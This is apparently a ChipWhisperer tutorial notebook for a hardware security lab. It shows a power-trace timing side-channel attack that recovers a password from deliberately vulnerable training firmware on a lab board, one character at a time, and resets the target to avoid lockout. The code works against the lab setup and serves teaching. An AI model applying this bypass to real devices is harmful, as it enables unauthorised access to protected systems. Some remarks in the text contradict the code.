# Timing Analysis with Power for Password Bypass

Supported setups:

SCOPES:

* OPENADC

PLATFORMS:

* CWLITEXMEGA

## Basic Setup

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'
CRYPTO_TARGET = 'NONE'

In [ ]:
%run "Helper_Scripts/Setup_Generic.ipynb"

Setup is the same as usual, except this time we'll be capturing 2000 traces.

In [ ]:
scope.adc.samples = 2000

## Helper Functions for Password Attack

As was mentioned at the beginning of the tutorial, the firmware we loaded onto the target implements a basic password check. After getting a `'\n'` terminated password, the target checks it and enters an infinite loop, so before communicating with it, we'll need to reset it.

We'll be doing this a lot, so we'll define a function that resets the target (this function is also available by running "Helper_Scripts/Setup.ipynb" as we did above):

In [ ]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool
from bokeh.models import Range1d

output_notebook()

In [ ]:
import time
def reset_target(scope):
        scope.io.pdic = 'low'
        time.sleep(0.05)
        target.flush()
        scope.io.pdic = 'high'
        time.sleep(0.05)


In [ ]:
def cap_pass_trace(pass_guess, fPrint = False):
    ret = ""
    reset_target(scope)
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()

    if fPrint == True:
        print(ret)
    
    scope.arm()
    target.flush()
    target.write(pass_guess)
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    
    ret = ""
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()
    
    return trace, ret

**NOTE**
The text may appear cutoff, accompanied by a message about data loss. This means that the buffer used to store serial data (128 bytes) from the target is full. This isn't an issue here, since the text is just aesthetic, but keep this in mind if you want to do large transfers of serial data using ChipWhisperer. 

## Timing Analysis

Trace a Password attempt

In [ ]:
def tracemult(psw):
    outputbuf = ""
    # h0px3
    psw_good = psw + '\n'
    psw_false = psw[:-1] + '\xff\n'
    
    diff = [0] * 2000
    for i in range(5):
        print('.', end='')
        trace, outputbuf = cap_pass_trace(psw_good, False)
        trace2, outputbuf = cap_pass_trace(psw_false, False)

        diff += abs(trace-trace2)
    return diff

In [ ]:
diff = tracemult('h')
print('\nStandard deviation: {}'.format(diff.std()))

In [ ]:
maxvalue = diff.max()
maxindex = diff.argmax()
meanvalue = diff.mean()
percent = maxvalue / meanvalue *100.0
print('Max value {:.6f} at position {}'.format(maxvalue, maxindex))
print('Mean value of trace {:.6f} is {:.0f} Percent of max value'.format(meanvalue, percent))

In [ ]:
p = figure()
p.y_range = Range1d(0, 0.8)
p.add_tools(CrosshairTool())
p.line(x_range, diff)
#p.line(x_range, trace2, line_color='green')
show(p)

## Attacking a Single Letter

The plan for the attack: usa SAD (Sum of absolute difference) to find the correct letter. To do this, we'll create a loop that:

* Figures out our next guess
* Figures out a next false guess
* Does the capture and records the traces
* Calculate the SAD value $sad = \sum_{}^{}abs(trace1 - trace2)$
* Checks if the SAD value is in a proper range to know that the correct letter ist found


In [ ]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
outputbuf = ""

# set false password
next_pass_false = b'\xff\x0a'

# trace false try
trace_false, outputbuf = cap_pass_trace(next_pass_false)

allMax = 0.0
foundC = ''
for c in trylist:
    # set password
    next_pass = password + c
    # trace good and false several times
    diff = tracemult(next_pass)
    maxvalue = diff.max()
    maxindex = diff.argmax()
    meanvalue = diff.mean()
    percent = maxvalue / meanvalue *100.0
    #print('Character : ' + c)
    #print('Char : {:s} Max value {:.6f} at position {}'.format(c, maxvalue, maxindex))
    #print('Mean value of trace {:.6f} is {:.0f} Percent of max value'.format(meanvalue, percent))
    
    if allMax < maxvalue:
        allMax = maxvalue
        foundC = c
print("Success: " + foundC)
        

## Attacking the Full Password

Now that we can guess a single character, attacking the rest is easy; we just need to repeat the process in another loop, move the check point (this is the change is location you recorded earlier), and update our guess with the new correct letter.


In [ ]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
outputbuf = ""
for i in range(30):    
    # set next false password
    next_pass_false = password + ' ' + "\n"
    # trace false try
    trace_false, outputbuf = cap_pass_trace(next_pass_false)

    for c in trylist:
        # set next password
        next_pass = password + c + "\n"
        # trace both passwords
        trace, outputbuf = cap_pass_trace(next_pass)
        # calculate sad value
        sad = abs(trace - trace_false).sum()
        if sad > 50.0:
            password += c
            print("Success, pass now {}".format(password))
            break

    if "Welcome" in outputbuf:
        print('Password fully attacked : {}'.format(password))
        break

That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:

* The current script doesn't look for the "WELCOME" message when the password is OK. That is an extension that allows it to crack any size password.
* If there was a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.

## Tests

In [ ]:
outputbuf = ""
trace, outputbuf = cap_pass_trace(password + '\n', True)
print (outputbuf)
if "Welcome" not in outputbuf:
    print("Failed to break password, got {}.\n".format(password))


## Disconnect

In [ ]:
scope.dis()
target.dis()